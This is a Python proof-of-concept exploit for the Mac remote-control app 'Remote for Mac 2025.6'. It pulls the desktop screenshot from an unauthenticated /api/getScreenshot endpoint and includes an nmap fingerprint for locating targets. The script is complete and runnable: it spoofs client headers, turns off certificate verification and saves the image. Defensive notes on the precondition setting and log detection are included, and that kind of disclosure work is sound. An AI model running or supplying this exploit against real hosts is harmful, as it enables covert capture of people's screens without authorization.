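#!/usr/bin/env python3
# Exploit Title: Remote for Mac 2025.6 - Unauthenticated Desktop Screenshot Capture
# Date: 2025-05-26
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://cherpake.com/
# Software Link: https://cherpake.com/latest.php?os=mac
# Version: 2025.6
# Tested on: macOS Mojave 10.14.6
"""
Description:
- Exploits the getScreenshot API endpoint in Remote for Mac application
- Works when "Allow unknown devices" setting is enabled (default: disabled)

Vulnerable Component:
- /api/getScreenshot endpoint with missing authentication checks

Identification:
nmap -p- -T4 --script ssl-cert <host>
Look for SSL cert with Subject:
commonName=SecureHTTPServer/organizationName=Deusty Designs, LLC/stateOrProvinceName=Missouri/countryName=US

Defensive notes:
- The precondition is the "Allow unknown devices" setting; leaving it at its
  default (disabled) removes the condition this script depends on.
- The request is an HTTPS GET for /api/getScreenshot. Where application or
  TLS-terminating proxy logs are available, requests for that path from
  unknown devices are the thing to look for.
- The header values sent below are constants hard-coded in this script; they
  identify this exact PoC but are trivially changed, so match on the path and
  the source rather than on the header values.
"""

import requests
import sys
from urllib3.exceptions import InsecureRequestWarning

# verify=False is used below, so silence the warning urllib3 would print for
# every unverified HTTPS request.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# Fixed client-identification headers sent with the request. They are literal
# placeholder values, not credentials obtained from the target.
CLIENT_HEADERS = {
    "X-ClientToken": "123456",
    "X-HostName": "apple iMac",
    "X-HostFullModel": "iMac17,1",
}


def capture_screenshot(ip, port, output_file):
    """Request /api/getScreenshot from the host and save the returned JPEG.

    Args:
        ip: Host name or address of the machine running Remote for Mac.
        port: TCP port of its HTTPS service.
        output_file: Path the image bytes are written to.

    Returns:
        True if the server answered HTTP 200 with a body that starts with the
        JPEG start-of-image marker (FF D8) and the body was written to
        ``output_file``; False on any other response, request error or
        file-write error.
    """
    url = f"https://{ip}:{port}/api/getScreenshot"

    try:
        # Certificate validation is off: the Identification note describes a
        # "SecureHTTPServer" certificate, presumably self-signed (confirm).
        response = requests.get(
            url,
            headers=CLIENT_HEADERS,
            verify=False,
            timeout=15,
        )
    except requests.RequestException as e:
        # Connection, TLS, timeout and malformed-URL failures all land here.
        print(f"[-] Error: {e}")
        return False

    # Accept the body only if it is a success response that looks like a JPEG.
    if response.status_code == 200 and response.content.startswith(b"\xff\xd8"):
        try:
            with open(output_file, "wb") as f:
                f.write(response.content)
        except OSError as e:
            print(f"[-] Error: {e}")
            return False
        print(f"[+] Saved: {output_file}")
        return True

    # Anything else (including a 200 with a non-JPEG body) is reported with
    # the status code and the raw response body.
    print(f"[-] Failed: HTTP {response.status_code}")
    print(response.content)
    return False


if __name__ == "__main__":
    if len(sys.argv) < 4:
        # The argument placeholders were missing from the usage text.
        print(f"Usage: {sys.argv[0]} <ip> <port> <output_file>")
        sys.exit(1)

    ok = capture_screenshot(sys.argv[1], sys.argv[2], sys.argv[3])
    sys.exit(0 if ok else 1)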